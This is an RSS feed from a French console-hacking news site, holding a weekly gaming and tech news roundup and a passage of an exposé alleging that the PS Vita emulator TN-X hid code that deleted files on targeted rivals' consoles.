<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>
<channel>
	<title>Archives des malware - Custom Protocol</title>
	<atom:link href="https://www.customprotocol.com/tags/malware/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.customprotocol.com/tags/malware/</link>
	<description>Site d&#039;hack-tualité et de tutoriels sur la customisation de consoles et appareils (homebrews, plugins, émulation...)</description>
	<lastBuildDate>Tue, 16 Feb 2016 18:58:16 +0000</lastBuildDate>
	<language>fr-CA</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	
	<item>
		<title>[NODS] Crash Bandicoot, Ubisoft, Sonic, un malware et Windows</title>
		<link>https://www.customprotocol.com/chroniques/nods-13-crash-bandicoot-ubisoft-sonic-fysbis-windows/</link>
					<comments>https://www.customprotocol.com/chroniques/nods-13-crash-bandicoot-ubisoft-sonic-fysbis-windows/#comments</comments>
		
		<dc:creator><![CDATA[Tuxbot123]]></dc:creator>
		<pubDate>Tue, 16 Feb 2016 18:58:16 +0000</pubDate>
				<category><![CDATA[Chroniques]]></category>
		<category><![CDATA[News Officielles De la Semaine]]></category>
		<category><![CDATA[Aegis]]></category>
		<category><![CDATA[Crash Bandicoot]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[PlayStation]]></category>
		<category><![CDATA[Sonic]]></category>
		<category><![CDATA[Vidéos]]></category>
		<category><![CDATA[Windows]]></category>
		<guid isPermaLink="false">https://www.customprotocol.com/?post_type=it_chroniques&#038;p=8907</guid>
					<description><![CDATA[<p>Bienvenue dans les News Officielles de la Semaine du 8 février&#8239;!</p>
<p>L’article <a rel="nofollow" href="https://www.customprotocol.com/chroniques/nods-13-crash-bandicoot-ubisoft-sonic-fysbis-windows/">[NODS] Crash Bandicoot, Ubisoft, Sonic, un malware et Windows</a> est apparu en premier sur <a rel="nofollow" href="https://www.customprotocol.com">Custom Protocol</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="text-align: justify;"><div align="justify" class="signoff"><i class="fa fa-fw fa-globe"></i></div>
<p style="text-align: justify;">Cette semaine, <em>Playstation</em> réveille un mort, <em>SEGA </em>en achève un et <em>Assassin's Creed</em> agonise. Quoi de mieux que la mort pour fêter la Saint-Valentin&#8239;? <em>Wait</em>...</p>
<p style="text-align: justify;"><a href="https://www.customprotocol.com/medias/2016/02/nods_n13.png" rel="attachment wp-att-8921"><img fetchpriority="high" decoding="async" class="aligncenter size-large wp-image-8921" src="https://www.customprotocol.com/medias/2016/02/nods_n13-764x428.png" alt="nods_n13" width="764" height="428" /></a></p>
<hr />
<h4 style="text-align: justify;"><span style="text-decoration: underline;">1) Les woompas seraient-ils enfin mûrs&#8239;?</span></h4>
<p style="text-align: justify;">Un nouveau <em>Crash Bandicoot</em> serait-il (enfin) sur les rails&#8239;? C'est ce que laisse croire un <em>tweet</em> de <em>Playstation Moyen-Orient</em>&nbsp;:</p>
<div align="center">
<blockquote class="twitter-tweet">
<p dir="rtl" lang="ar">أكثر شخص مطلوب... أين أنت يا كراش؟ <a href="https://t.co/aj85Ap018v">pic.twitter.com/aj85Ap018v</a></p>
<p>— PlayStation Mid East (@PlayStation_ME) <a href="https://twitter.com/PlayStation_ME/status/696008709231607808">6 Février 2016</a></p></blockquote>
</div>
<p style="text-align: justify;">Traduction pour les gens qui ne parleraient pas le Moyen-Orientais&nbsp;:</p>
<p style="text-align: justify;"><blockquote><p><div align="justify"><em>Most wanted person... where are you <em>Crash</em>?</em></div> <small><cite title="Traduction du tweet de Playstation Moyen-Orient">Traduction du tweet de Playstation Moyen-Orient</cite></small></p></blockquote>
<p style="text-align: justify;">De plus, <em>Randy Falk</em> de la société <em>NECA Toys</em>, fabricant de figurines sous licence,<strong> a fait référence à <em>Crash Bandicoot</em> dans une interview</strong> de <em>Pixel Dan</em>. Retrouvez la bourde à 4:10 très exactement dans la vidéo suivante.</p>
<div class="inserervideo"><iframe width="560" height="315" src="https://www.youtube.com/embed/4J8ZIRWbZi8?start=250" frameborder="0" allowfullscreen="allowfullscreen"></iframe></div>
<p style="text-align: justify;">Enfin un retour de <em>Crash</em>, dans une nouvelle aventure&#8239;? Ou simple <em>remake</em> des précédents volets&#8239;? Dans tous les cas, <strong>nous ne pouvons qu'espérer</strong>...</p>
<h4 style="text-align: justify;"><span style="text-decoration: underline;">2) Quand Assassin's Creed passe, les actionnaires aboient</span></h4>
<p style="text-align: justify;"><em>Assassin's Creed Unity</em> a laissé un souvenir relativement mauvais aux joueurs, de même qu'<em>Assassin's Creed Syndicate</em>. C'est pourquoi <em>Ubisoft</em> a décidé de<strong> ne pas sortir de gros jeu de la licence en 2016</strong>, se laissant une année pour reprendre les choses en main. Quand je dis "pas de <span style="text-decoration: underline;">gros</span> jeu", cela ne veut pas dire qu'il n'y en aura pas&nbsp;: <em>Assassin's Creed India</em> et <em>Russia</em> devraient sortir cette année (y compris sur PS Vita&#8239;!), ainsi qu'un jeu mobile, déjà sorti sur <em>iOS</em> dans certains pays.</p>
<p style="text-align: justify;">En revanche, la société française a officialisé son planning pour l'année 2017 (ils sont pas en retard). On y retrouve sans surprise <em>For Honor,</em> <em>South Park: The Fractured But Whole</em> et <em>Ghost Recon: Wildlands</em> qui étaient prévus, mais aussi <strong><em>Watch_Dogs 2</em> </strong>qui était un peu moins prévu ainsi qu'une nouvelle licence, qui sera "<em>une nouvelle licence AAA à fort potentiel possédant des fonctionnalités numériques importantes</em>". Un jeu en ligne, quoi.</p>
<p style="text-align: justify;">L'action d'<em>Ubisoft</em> a chuté de 10&#8239;% cette année, avec pour cause majeure, le flop de <em>Syndicate</em>, premier <em>Assassin's Creed</em> dont <em>Ubisoft</em> a refusé de communiquer les chiffres. C'est Bolloré qui doit être content.</p>
<figure id="attachment_8914" aria-describedby="caption-attachment-8914" style="width: 500px" class="wp-caption aligncenter"><a href="https://www.customprotocol.com/medias/2016/02/0382a649-78a0-48ce-c8e0-f9620613a00b.png" rel="attachment wp-att-8914"><img decoding="async" class="size-medium wp-image-8914" src="https://www.customprotocol.com/medias/2016/02/0382a649-78a0-48ce-c8e0-f9620613a00b-500x281.png" alt="&quot;Je crois que je me suis cassé le petit orteil.&quot;" width="500" height="281" /></a><figcaption id="caption-attachment-8914" class="wp-caption-text">"Je crois que je me suis cassé le petit orteil."</figcaption></figure>
<h4 style="text-align: justify;"><span style="text-decoration: underline;">3) Une génération entière d'enfants traumatisés <em>incoming</em></span></h4>
<p style="text-align: justify;"><strong>Le film <em>Sonic The Hedgehog</em> sortira en 2018</strong> et... J'ai une mauvaise nouvelle... Ça va pas trop vous plaire... Oh et puis merde, foutu pour foutu&nbsp;: <strong>ça va être du <em>live-action</em></strong>. Voilà. Puisque j'ai rien envie de dire de plus après cette révélation traumatisante, nous allons passer à la suite. Comment ça, vous voulez en savoir plus&#8239;? En fait, vous êtes maso.</p>
<p style="text-align: justify;">Que dire de plus... Ha oui, que <strong><a href="https://fr.wikipedia.org/wiki/Film_live" target="_blank" rel="noopener noreferrer"><em>live-action</em></a></strong> <strong>signifie qu'il y aura des humains</strong>.<br /> Et que c'est <em>Sony Pictures</em> qui dirige le <del>futur navet</del> film d'une licence dont le dernier opus sur ses plateformes remonte à 2011 (<em>seems logic</em>).</p>
<p style="text-align: justify;">Et qu'<strong>il y a de grandes chances que ça ressemble à l'infâme série de jeux/TV <em>Sonic Boom</em></strong> et son esthétique dégueulasse, avec un <em>Knuckles</em> de 2 mètres de haut comme de large, un <em>Sonic</em> aux jambes plus longues que le reste du corps et un <em>Tails</em> ingénieur nain. Youpi.</p>
<figure id="attachment_8912" aria-describedby="caption-attachment-8912" style="width: 500px" class="wp-caption aligncenter"><a href="https://www.customprotocol.com/medias/2016/02/Caca.jpg" rel="attachment wp-att-8912"><img decoding="async" class="size-medium wp-image-8912" src="https://www.customprotocol.com/medias/2016/02/Caca-500x281.jpg" alt="Les personnages de Sonic Boom, jeu qui usurpe le nom de ce pauvre Sonic qui doit se retourner dans sa tombe." width="500" height="281" /></a><figcaption id="caption-attachment-8912" class="wp-caption-text">Les personnages de <em>Sonic Boom</em>, jeu qui usurpe le nom de ce pauvre <em>Sonic</em> qui doit se retourner dans sa tombe.</figcaption></figure>
<h4 style="text-align: justify;"><span style="text-decoration: underline;">4) Gentil petit malware</span></h4>
<p style="text-align: justify;">Le <strong>malware Fysbis</strong> (<em>Linux.BackDoor.Fysbis</em> de son petit nom) a été découvert en 2014. Mais c'est cette semaine que des chercheurs en sécurité de <em>Palo Alto Networks</em> ont découvert à quoi il sert. Tout d'abord, rassurez-vous, il y a peut de chances que ce soit le type de <strong>malware</strong> que vous trouverez sur votre ordi. D'une part parce qu'il est pour <em>Linux</em>, d'autre part parce qu'<strong>il a été créé pour l'espionnage industriel</strong>. À moins que vous ne travaillez à la <em>NSA</em> pendant votre temps libre, je ne pense pas que vous le trouverez chez vous.</p>
<p style="text-align: justify;">Ce <strong>malware</strong> aurait été créé par le groupe de <em>cyber-espions APT 28</em>, qui travaillerait pour le gouvernement russe&nbsp;: il y a dans son code source un certain nombre de mots en russe, mais aussi et surtout car<strong> l'<em>OTAN</em>, l'<em>Electronic Frontier Foundation</em> ou encore le gouvernement polonais</strong> auraient été ciblées.</p>
<p style="text-align: justify;"><a href="http://www.haktuts.in/2016/02/fysbis-malware-allow-hacker-to-spy-on-linux.html" target="_blank" rel="noopener noreferrer">Beaucoup, beaucoup, beaucoup plus d'infos ici (en anglais)</a>.</p>
<p style="text-align: justify;"><a href="https://www.customprotocol.com/medias/2016/02/malware-Fysbis-Linux-cible.jpg" rel="attachment wp-att-8937"><img decoding="async" class="aligncenter size-medium wp-image-8937" src="https://www.customprotocol.com/medias/2016/02/malware-Fysbis-Linux-cible-500x239.jpg" alt="malware Fysbis Linux cible" width="500" height="239" /></a></p>
<h4 style="text-align: justify;"><span style="text-decoration: underline;">5) L'utilitaire de la semaine</span></h4>
<p style="text-align: justify;"><a href="https://github.com/th3power/aegis-voat/releases" target="_blank" rel="noopener noreferrer"><em>Aegis</em></a> est un utilitaire pour <em>Windows 7</em> et <em>8.x</em> qui servira aux quelques personnes qui tiennent encore à leur vie privée. Ce petit programme supprime tout ce que <em>Microsoft</em> veut que vous fassiez/donniez mais que vous ne vouliez pas faire/donner&nbsp;:</p>
<ul style="text-align: justify;">
<li>Désactive ou masque les notifications de téléchargement de <em>Windows 10 </em>;</li>
<li>Désactive <em>GWX</em> (<em>Get Windows 10</em>), <em>OneDrive</em>, <em>Telemetry </em>et <em>Wifisense </em>;</li>
<li>Désinstalle ou masque les mises à jour <em>31 KB </em>;</li>
<li>Désactive 31 tâches programmées&#8239;;</li>
<li>Désinstalle <em>Diagtrack </em>;</li>
<li>Désactive <em>Remote Registry </em>;</li>
<li>Bloque 188 "hosts" <em>Microsoft</em> sur 221 adresses IP&#8239;;</li>
<li>Change les paramètres de <em>Windows Update</em> pour vérifier/notifier au lieu de télécharger/installer.</li>
</ul>
<p style="text-align: justify;">C'est quand même dingue de voir qu'il faut passer par un programme externe pour que son OS ne nous traque pas... <a href="https://github.com/th3power/aegis-voat/releases" target="_blank" rel="noopener noreferrer">Téléchargement ici</a>.</p>
<hr />
<p>C'est ainsi que se terminent ces<strong> News de la Semaine</strong>, merci de les avoir suivies et bonnes vacances à ceux qui y sont (sachez que nous vous détestons &lt;3)&#8239;!</p>
<p>L’article <a rel="nofollow" href="https://www.customprotocol.com/chroniques/nods-13-crash-bandicoot-ubisoft-sonic-fysbis-windows/">[NODS] Crash Bandicoot, Ubisoft, Sonic, un malware et Windows</a> est apparu en premier sur <a rel="nofollow" href="https://www.customprotocol.com">Custom Protocol</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.customprotocol.com/chroniques/nods-13-crash-bandicoot-ubisoft-sonic-fysbis-windows/feed/</wfw:commentRss>
			<slash:comments>8</slash:comments>
		
		
			</item>
		<item>
		<title>[MàJ] [Vita] Le TN-X&#160;: un malware bien caché (patch disponible)</title>
		<link>https://www.customprotocol.com/le-tn-x-un-malware-bien-cache-patch-disponible/</link>
					<comments>https://www.customprotocol.com/le-tn-x-un-malware-bien-cache-patch-disponible/#comments</comments>
		
		<dc:creator><![CDATA[Wirus]]></dc:creator>
		<pubDate>Wed, 18 Mar 2015 22:13:41 +0000</pubDate>
				<category><![CDATA[Dossiers]]></category>
		<category><![CDATA[Dossiers Underground]]></category>
		<category><![CDATA[Top Articles]]></category>
		<category><![CDATA[Underground]]></category>
		<category><![CDATA[malware]]></category>
		<guid isPermaLink="false">https://www.customprotocol.com/?p=3214</guid>
					<description><![CDATA[<p>La vie n'est pas rose et même la scène underground regorge de personnes malhonnêtes... C'est le cas de Total_Noob, qui vient de perdre tout mon respect aujourd'hui.&#160;:-/</p>
<p>L’article <a rel="nofollow" href="https://www.customprotocol.com/le-tn-x-un-malware-bien-cache-patch-disponible/">[MàJ] [Vita] Le TN-X&nbsp;: un malware bien caché (patch disponible)</a> est apparu en premier sur <a rel="nofollow" href="https://www.customprotocol.com">Custom Protocol</a>.</p>
]]></description>
										<content:encoded><![CDATA[<figure id="attachment_4056" aria-describedby="caption-attachment-4056" style="width: 1024px" class="wp-caption aligncenter"><a href="https://www.customprotocol.com/medias/2015/01/TN-X-Total_Noob-malware.png"><img decoding="async" class="size-large wp-image-4056" src="https://www.customprotocol.com/medias/2015/01/TN-X-Total_Noob-malware-1024x576.png" alt="Merci à @Windvern pour la superbe vignette&#8239;! 8-)" width="1024" height="576" srcset="https://www.customprotocol.com/medias/2015/01/TN-X-Total_Noob-malware-1024x576.png 1024w, https://www.customprotocol.com/medias/2015/01/TN-X-Total_Noob-malware-300x169.png 300w, https://www.customprotocol.com/medias/2015/01/TN-X-Total_Noob-malware-768x432.png 768w, https://www.customprotocol.com/medias/2015/01/TN-X-Total_Noob-malware-370x208.png 370w, https://www.customprotocol.com/medias/2015/01/TN-X-Total_Noob-malware-270x152.png 270w, https://www.customprotocol.com/medias/2015/01/TN-X-Total_Noob-malware-570x321.png 570w, https://www.customprotocol.com/medias/2015/01/TN-X-Total_Noob-malware-740x416.png 740w, https://www.customprotocol.com/medias/2015/01/TN-X-Total_Noob-malware.png 1920w, https://www.customprotocol.com/medias/2015/01/TN-X-Total_Noob-malware-300x169@2x.png 600w, https://www.customprotocol.com/medias/2015/01/TN-X-Total_Noob-malware-768x432@2x.png 1536w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><figcaption id="caption-attachment-4056" class="wp-caption-text"><em>Merci à <a href="http://windvern.deviantart.com" target="_blank" rel="noopener noreferrer">@Windvern</a> pour la <a href="http://customprotocol.deviantart.com/art/The-TN-X-malware-658827960" target="_blank" rel="noopener noreferrer">superbe vignette</a>&#8239;! <img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f60e.png" alt="😎" class="wp-smiley" style="height: 1em; max-height: 1em;" /></em></figcaption></figure>
<p style="text-align: justify;">Comme je l'ai dit sur <em>Twitter</em> (merci à @Applelo1 pour l'inspiration)&nbsp;: le monde est rose, mais c'est du rose de PQ&nbsp;: il y a donc de la merde à certains endroits (beaucoup même)... Et ce quel que soit le domaine&nbsp;: qu'il s'agisse de politique, de sport, de cinéma, de musique, de jeux vidéo, des individus parfois idolâtrés n'hésitent pas à user de coups bas pour parvenir à leurs sombres fins, quitte à ce que leur supercherie soit découverte et divulguée au monde entier, que tout le respect que portaient des centaines, des milliers voire des millions de personnes partent en fumée et qu'ils perdent leur(s) statut(s)/métier(s).</p>
<h4 style="text-align: justify;"><span style="text-decoration: underline;"><strong>Introduction</strong></span>&nbsp;:</h4>
<p style="text-align: justify;">Avant toute chose, soyons clairs&nbsp;: <strong>Total_Noob</strong> est l'un des plus grands noms de la scène <em>hack</em> PSP &amp; PS Vita de ces dernières années, c'est lui qui est à l'origine des <em>Custom Firmwares</em> TN sur PSP ainsi que des nombreux <em>eCFW</em> <strong>TN-V</strong> (émulateur PSP qui va même jusqu'à émuler le XMB), <a title="TUTO&nbsp;-&nbsp;Installer et utiliser le TN-C en 3.36 (Numblast)" href="https://www.customprotocol.com/underground/tuto-installer-le-tn-c-en-3-36-numblast/" target="_blank" rel="noopener noreferrer">TN-C</a> et plus récemment <strong><a title="[Vita] L’eCFW TN-X tourne désormais sur les firmwares 3.00~3.20" href="https://www.customprotocol.com/underground/lecfw-tn-x-tourne-desormais-sur-les-firmwares-3-003-20/" target="_blank" rel="noopener noreferrer">TN-X</a></strong> de la PS Vita. Et pour tout ce travail qu'il a accompli et qui a permis des avancées considérables, je respecte son implication, ses qualités/compétences de <em>hackeur</em> et chacune de ses productions.</p>
<figure id="attachment_3228" aria-describedby="caption-attachment-3228" style="width: 300px" class="wp-caption aligncenter"><a href="https://www.customprotocol.com/medias/2015/03/aloader-v2-6-39-tn-a-extended.png"><img decoding="async" class="size-medium wp-image-3228" src="https://www.customprotocol.com/medias/2015/03/aloader-v2-6-39-tn-a-extended-300x170.png" alt="L'excellent CFM 6.38 TN-1 Extended" width="300" height="170" srcset="https://www.customprotocol.com/medias/2015/03/aloader-v2-6-39-tn-a-extended-300x170.png 300w, https://www.customprotocol.com/medias/2015/03/aloader-v2-6-39-tn-a-extended-370x210.png 370w, https://www.customprotocol.com/medias/2015/03/aloader-v2-6-39-tn-a-extended-270x153.png 270w, https://www.customprotocol.com/medias/2015/03/aloader-v2-6-39-tn-a-extended.png 480w" sizes="(max-width: 300px) 100vw, 300px" /></a><figcaption id="caption-attachment-3228" class="wp-caption-text">L'excellent CFM 6.38 TN-1 Extended</figcaption></figure>
<p style="text-align: justify;">Néanmoins, vous devez savoir que certaines personnes peuvent cacher une face bien moins souriante et confiante qu'ils ne peuvent le laisser penser. <strong>Total_Noob</strong> fait partie de cette catégorie d'individus, très peu respectables et fortement dédaignables, et c'est pour cette personnalité méprisable que je ne respecte pas... pardon, que je ne respecte plus ce programmeur. Enfin, quoiqu'il en soit, il est tombé extrêmement bas dans mon estime, et je suis le premier déçu par le comportement qu'il a eu.</p>
<p style="text-align: justify;">Je vais vous expliquer ce qu'il s'est passé, mais attention&nbsp;: le dossier risque d'être assez long. Assurez-vous donc d'avoir un peu de temps à perdre devant vous, et activez le mode "père Castor"&#8239;!</p>
<figure id="attachment_3098" aria-describedby="caption-attachment-3098" style="width: 300px" class="wp-caption aligncenter"><a href="https://www.customprotocol.com/medias/2015/03/tn-x-ps-vita-photo-wololo-total_noob-firmwares-3.00-3.20.jpg"><img decoding="async" class="size-medium wp-image-3098" src="https://www.customprotocol.com/medias/2015/03/tn-x-ps-vita-photo-wololo-total_noob-firmwares-3.00-3.20-300x169.jpg" alt="Photo du TN-X par REPREP sur une PS TV" width="300" height="169" srcset="https://www.customprotocol.com/medias/2015/03/tn-x-ps-vita-photo-wololo-total_noob-firmwares-3.00-3.20-300x169.jpg 300w, https://www.customprotocol.com/medias/2015/03/tn-x-ps-vita-photo-wololo-total_noob-firmwares-3.00-3.20-768x432.jpg 768w, https://www.customprotocol.com/medias/2015/03/tn-x-ps-vita-photo-wololo-total_noob-firmwares-3.00-3.20-1024x576.jpg 1024w, https://www.customprotocol.com/medias/2015/03/tn-x-ps-vita-photo-wololo-total_noob-firmwares-3.00-3.20-370x208.jpg 370w, https://www.customprotocol.com/medias/2015/03/tn-x-ps-vita-photo-wololo-total_noob-firmwares-3.00-3.20-270x152.jpg 270w, https://www.customprotocol.com/medias/2015/03/tn-x-ps-vita-photo-wololo-total_noob-firmwares-3.00-3.20-570x321.jpg 570w, https://www.customprotocol.com/medias/2015/03/tn-x-ps-vita-photo-wololo-total_noob-firmwares-3.00-3.20-740x416.jpg 740w, https://www.customprotocol.com/medias/2015/03/tn-x-ps-vita-photo-wololo-total_noob-firmwares-3.00-3.20.jpg 1920w, https://www.customprotocol.com/medias/2015/03/tn-x-ps-vita-photo-wololo-total_noob-firmwares-3.00-3.20-300x169@2x.jpg 600w, https://www.customprotocol.com/medias/2015/03/tn-x-ps-vita-photo-wololo-total_noob-firmwares-3.00-3.20-768x432@2x.jpg 1536w" sizes="(max-width: 300px) 100vw, 300px" /></a><figcaption id="caption-attachment-3098" class="wp-caption-text">Photo du TN-X par REPREP sur une PS TV</figcaption></figure>
<h4 style="text-align: justify;"><span style="text-decoration: underline;"><strong>Le TN-X&nbsp;: pourquoi il est méchant m'sieur ?</strong></span></h4>
<p style="text-align: justify;">Revenons quelques jours en arrière&nbsp;: le 12 mars dernier, <b>Total_Noob</b> dévoilait publiquement le fruit de son travail acharné&nbsp;: le <strong><a title="[Vita] L’eCFW TN-X tourne désormais sur les firmwares 3.00~3.20" href="https://www.customprotocol.com/underground/lecfw-tn-x-tourne-desormais-sur-les-firmwares-3-003-20/" target="_blank" rel="noopener noreferrer">TN-X</a></strong>, un autre <em>eCFW</em> pour PS Vita qui avait la particularité de lancer (enfin&#8239;!) les <em>backups</em> de jeux PS1 sans problème. À peine quelques jours plus tard, malgré la grande qualité de l'émulateur, de nombreux internautes ont soulevé un point assez fâcheux&nbsp;: la signature automatique de chaque <em>screenshot</em>. Une version 2 est donc rapidement sortie pour le plus grand bonheur de tous, ce afin de contourner ce problème majeur et ma foi assez contrariant (c'est pas que j'aime pas avoir des <em>screenshots</em> signés, hein, non pas du tout, mais... voilà quoi). </p>
<p style="text-align: justify;"><div align="justify" class="signoff"><i class="fa fa-fw fa-comments"></i>Il est où le rapport&#8239;? Je commence à m'endormir...</div>
<p style="text-align: justify;">Pour une personne "normale" comme la plupart d'entre vous, c'est-à-dire qui n'a pas d'affinité spéciale avec les pirates informatiques qui nous pondent chaque mois des logiciels de plus en plus performants et utiles (je ne sais pas si une icône du <em>hack</em> PSP/Vita nous lit, mais si oui qu'il soit le bienvenu&#8239;!&nbsp;:D), vous n'avez normalement rien remarqué&nbsp;: tous vos <em>eCFW </em>marchaient à perfection et dans le meilleur des mondes, et le dernier <strong>TN-X</strong> vous semblait le plus abouti jusqu'à ce jour.</p>
<figure id="attachment_3220" aria-describedby="caption-attachment-3220" style="width: 300px" class="wp-caption aligncenter"><a href="https://www.customprotocol.com/medias/2015/03/tn-v-vita-key-ftp-psp-emulation.png"><img decoding="async" class="size-medium wp-image-3220" src="https://www.customprotocol.com/medias/2015/03/tn-v-vita-key-ftp-psp-emulation-300x113.png" alt="Photo du TN-V en action sur 2 PS Vita, prise par The Zett" width="300" height="113" srcset="https://www.customprotocol.com/medias/2015/03/tn-v-vita-key-ftp-psp-emulation-300x113.png 300w, https://www.customprotocol.com/medias/2015/03/tn-v-vita-key-ftp-psp-emulation-768x288.png 768w, https://www.customprotocol.com/medias/2015/03/tn-v-vita-key-ftp-psp-emulation-1024x384.png 1024w, https://www.customprotocol.com/medias/2015/03/tn-v-vita-key-ftp-psp-emulation-370x139.png 370w, https://www.customprotocol.com/medias/2015/03/tn-v-vita-key-ftp-psp-emulation-270x101.png 270w, https://www.customprotocol.com/medias/2015/03/tn-v-vita-key-ftp-psp-emulation-570x214.png 570w, https://www.customprotocol.com/medias/2015/03/tn-v-vita-key-ftp-psp-emulation-740x278.png 740w, https://www.customprotocol.com/medias/2015/03/tn-v-vita-key-ftp-psp-emulation.png 1200w, https://www.customprotocol.com/medias/2015/03/tn-v-vita-key-ftp-psp-emulation-300x113@2x.png 600w" sizes="(max-width: 300px) 100vw, 300px" /></a><figcaption id="caption-attachment-3220" class="wp-caption-text">Photo du <em>TN-V</em> en action sur une PS Vita, prise par <em>The Zett</em></figcaption></figure>
<p style="text-align: justify;">Seulement voilà&nbsp;: comme dans chaque domaine, quels que soient leur importance et leur puissance, les "chefs" ne travaillent pas pour autant tous mains dans la mains, en partageant tous leurs secrets et en caressant des licornes qui passent par-ci ou par-là. La scène <em>underground</em> ne déroge pas à la règle&nbsp;: deux grands développeurs reconnus peuvent se faire la guerre dans l'ombre et se haïr mutuellement (ou non), certains n'hésitant pas à en venir jusqu'au mensonge, à la propagation d'<em>intox</em> ou, pire, à la tentation/recherche d'éliminer leur(s) adversaire(s) par tous les moyens possibles.</p>
<p style="text-align: justify;">Je me répète un peu, mais cet événement me désespère tellement que j'essaie de me calmer en rédigeant ce looong dossier, plutôt que d'en venir directement aux faits et dénoncer les actes assassins de <strong>Total_Noob</strong>... Enfin bref, faut que je me lance&nbsp;: en gros son fameux programme <strong>TN-X</strong> visait secrètement des cibles, qui ne sont autres que... bah des grands noms de la scène <em>hack</em> PSP &amp; Vita et autres ennemis de l'auteur. La cible numéro 1&nbsp;: <strong>The Zett</strong>, rédacteur principal sur le site anglophone de référence <em><a title="Site de Wololo" href="http://www.wololo.net" target="_blank" rel="noopener noreferrer">Wololo</a> </em>et créateur du site d'archives <a title="Site d'archives Zload.net" href="http://www.zload.net" target="_blank" rel="noopener noreferrer"><em>Zload.net</em></a>.</p>
<figure id="attachment_3221" aria-describedby="caption-attachment-3221" style="width: 300px" class="wp-caption aligncenter"><a href="https://www.customprotocol.com/medias/2015/03/The-Zett-target-total-noob-tn-x.png"><img decoding="async" class="wp-image-3221 size-medium" src="https://www.customprotocol.com/medias/2015/03/The-Zett-target-total-noob-tn-x-e1426714812977-300x186.png" alt="Cible principale repérée" width="300" height="186" srcset="https://www.customprotocol.com/medias/2015/03/The-Zett-target-total-noob-tn-x-e1426714812977-300x186.png 300w, https://www.customprotocol.com/medias/2015/03/The-Zett-target-total-noob-tn-x-e1426714812977-768x476.png 768w, https://www.customprotocol.com/medias/2015/03/The-Zett-target-total-noob-tn-x-e1426714812977-370x229.png 370w, https://www.customprotocol.com/medias/2015/03/The-Zett-target-total-noob-tn-x-e1426714812977-270x167.png 270w, https://www.customprotocol.com/medias/2015/03/The-Zett-target-total-noob-tn-x-e1426714812977-570x353.png 570w, https://www.customprotocol.com/medias/2015/03/The-Zett-target-total-noob-tn-x-e1426714812977-740x459.png 740w, https://www.customprotocol.com/medias/2015/03/The-Zett-target-total-noob-tn-x-e1426714812977.png 960w, https://www.customprotocol.com/medias/2015/03/The-Zett-target-total-noob-tn-x-e1426714812977-300x186@2x.png 600w" sizes="(max-width: 300px) 100vw, 300px" /></a><figcaption id="caption-attachment-3221" class="wp-caption-text">Cible principale repérée</figcaption></figure>
<h4 style="text-align: justify;"><span style="text-decoration: underline;"><strong>Les dégâts engendrés</strong></span>&nbsp;:</h4>
<p style="text-align: justify;">Si vous faisiez partie de la <em>blacklist</em> (la <em>$hit-list</em>) du développeur, vous aurez peut-être remarqué que votre PS Vita agissait étrangement avec les fichiers pourtant officiels et fonctionnels du <strong>TN-X</strong>. Dès le début, on peut se douter que quelque chose ne va pas&nbsp;: au lieu du traditionnel écran vert qui fait office de transition avant de lancer le programme, un écran rouge permanent apparaît à l'écran et ne lance pas l'émulateur, bien que tous les fichiers aient été correctement installés et mis en place. On se retrouve donc bloqué éternellement devant cet écran de la mort, dans l'incapacité de faire quelque chose...</p>
<p style="text-align: justify;">Mais ce n'est pas tout, ce ne serait pas assez drôle sinon&nbsp;: à chaque tentative du lancement du <strong>TN-X</strong>, une augmentation de l'espace libre est aussi observable. Et devinez comment une telle chose peut se produire ? Bingo, c'est le programme qui supprime vos fichiers&#8239;! En clair, si vous faites partie de cette "liste personnelle", vous pouvez dès à présent vous attendre au pire sur votre système PS Vita et les données qui y sont stockées, car on ne sait pas encore si d'autres "fonctions" détestables de ce genre ont été cachées dans les <em>releases</em> les plus récentes. Croisons les doigts...</p>
<figure id="attachment_3222" aria-describedby="caption-attachment-3222" style="width: 300px" class="wp-caption aligncenter"><a href="https://www.customprotocol.com/medias/2015/03/delete-supprimer-clavier.png"><img decoding="async" class="size-medium wp-image-3222" src="https://www.customprotocol.com/medias/2015/03/delete-supprimer-clavier-300x175.png" alt="Dites au revoir un à un à tous vos fichiers" width="300" height="175" srcset="https://www.customprotocol.com/medias/2015/03/delete-supprimer-clavier-300x175.png 300w, https://www.customprotocol.com/medias/2015/03/delete-supprimer-clavier-370x215.png 370w, https://www.customprotocol.com/medias/2015/03/delete-supprimer-clavier-270x157.png 270w, https://www.customprotocol.com/medias/2015/03/delete-supprimer-clavier.png 550w" sizes="(max-width: 300px) 100vw, 300px" /></a><figcaption id="caption-attachment-3222" class="wp-caption-text">Dites au revoir un à un à tous vos fichiers</figcaption></figure>
<p style="text-align: justify;">Si, en revanche, vous n'êtes pas une "cible" de <strong>Total_Noob</strong>, vous pouvez théoriquement continuer à n'éprouver aucune crainte (enfin presque) vis-à-vis de ses applications dont il serait bête de se passer (comme les <em>TN-V</em> et <strong>TN-X</strong> qui, on ne peut le nier, sont tout de même géniaux). Ayez juste en tête que l'individu derrière toutes ces belles créations n'est peut-être pas aussi "cool" et "sympathique" que nous ne l'imaginiez, et que comme vous le disait souvent votre mère&nbsp;: "l'habit de fait pas le moine". </p>
<h4 style="text-align: justify;"><span style="text-decoration: underline;"><strong>La ruse de Total_Noob</strong></span>&nbsp;:</h4>
<p style="text-align: justify;">Pour en revenir à notre petite histoire, en réalité cette ruse ne viserait (à priori) personne d'autre que <strong>The Zett</strong> : <strong>Total_Noob</strong> n'aurait en effet apparemment pas apprécié ce qu'aurait dit le rédacteur (quand et où, je ne sais pas), à savoir une vive critique de la signature des <em>screenshots</em> sur le <strong>TN-X </strong>dont nous avons parlé plus haut. </p>
